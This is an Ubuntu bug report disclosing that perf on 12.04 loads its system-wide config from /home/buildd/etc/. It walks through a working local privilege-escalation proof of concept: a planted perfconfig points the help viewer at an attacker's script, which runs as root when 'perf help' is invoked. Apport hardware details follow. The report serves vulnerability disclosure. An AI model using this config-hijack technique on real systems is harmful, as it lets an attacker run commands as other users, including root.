Comment 0 for bug 1206200

Perf has 2 types of config files -- user and system-wide. The path to the system-wide config file is set up at the build time.
Instead of using sane /etc/ path Ubuntu uses /home/buildd/etc/. It means a user with write access to this directory may create perfconfig file in the directory, fill it with any data, and wait another user to run perf. perf running as another user will read and parse this config file. The worst outcome is a privilege escalation with arbitrary command execution in case of 'perf help' run.

There are 2 constraints of the attack. First, an attacker has to own /home/buildd/etc/ directory, which means only 'buildd' user may make an attack.
Second, the possible attack is passive, so it can be carried out against users running perf only.

The code for the privilege escalation is as following:

$ which perf_3.2.0-49 | xargs strings | grep /home

As root:
# useradd -m buildd
# su - buildd
$ id
uid=1001(buildd) gid=1001(buildd) groups=1001(buildd)
$ mkdir etc
$ echo >etc/perfconfig
$ cat >etc/perfconfig <<EOF
 cmd = /home/buildd/shell
 viewer = shell
$ cat >shell <<EOF
echo 'All your base are belong to us'
man "\$@"
$ chmod a+x shell

Now run these as another user:
# id
uid=0(root) gid=0(root) groups=0(root)
# perf help anything
All your base are belong to us
No manual entry for perf-anything

I also checked Fedora 19 and Debian 8, they are not vulnerable.

ProblemType: Bug
DistroRelease: Ubuntu 12.04
Package: linux-tools
ProcVersionSignature: Ubuntu 3.2.0-49.75-generic 3.2.46
Uname: Linux 3.2.0-49-generic x86_64
AlsaVersion: Advanced Linux Sound Architecture Driver Version 1.0.24.
ApportVersion: 2.0.1-0ubuntu17.3
Architecture: amd64
 **** List of CAPTURE Hardware Devices ****
 card 0: PCH [HDA Intel PCH], device 0: ALC275 Analog [ALC275 Analog]
   Subdevices: 1/1
   Subdevice #0: subdevice #0
 /dev/snd/controlC0: vasya 3885 F.... pulseaudio
 Card hw:0 'PCH'/'HDA Intel PCH at 0xc9400000 irq 50'
   Mixer name : 'Intel CougarPoint HDMI'
   Components : 'HDA:10ec0275,104d5000,00100005 HDA:80862805,104d5000,00100000'
   Controls : 26
   Simple ctrls : 10
CheckboxSubmission: 8cd6ce4bf8fb309ce25728059c2cc919
CheckboxSystem: b633b4f40868d491c2ae5b50030ce6f3
Date: Mon Jul 29 21:10:20 2013
HibernationDevice: RESUME=UUID=000103f6-ab54-473d-8106-4af4b534c0ee
InstallationMedia: Ubuntu 12.04 LTS "Precise Pangolin" - Release amd64 (20120425)
MachineType: Sony Corporation VPCSA3S9R
MarkForUpload: True
ProcFB: 0 inteldrmfb
ProcKernelCmdLine: BOOT_IMAGE=/vmlinuz-3.2.0-49-generic root=/dev/mapper/vg_cachalot-lv_root ro crashkernel=384M-2G:64M,2G-:128M quiet splash vt.handoff=7
 linux-restricted-modules-3.2.0-49-generic N/A
 linux-backports-modules-3.2.0-49-generic N/A
 linux-firmware 1.79.4
SourcePackage: linux
StagingDrivers: rts_pstor
UpgradeStatus: No upgrade log present (probably fresh install) 10/13/2011
dmi.bios.vendor: INSYDE
dmi.bios.version: R2084H4
dmi.board.asset.tag: N/A VAIO
dmi.board.vendor: Sony Corporation
dmi.board.version: N/A
dmi.chassis.asset.tag: N/A
dmi.chassis.type: 10
dmi.chassis.vendor: Sony Corporation
dmi.chassis.version: N/A
dmi.modalias: dmi:bvnINSYDE:bvrR2084H4:bd10/13/2011:svnSonyCorporation:pnVPCSA3S9R:pvrC609XEG6:rvnSonyCorporation:rnVAIO:rvrN/A:cvnSonyCorporation:ct10:cvrN/A: VPCSA3S9R
dmi.product.version: C609XEG6
dmi.sys.vendor: Sony Corporation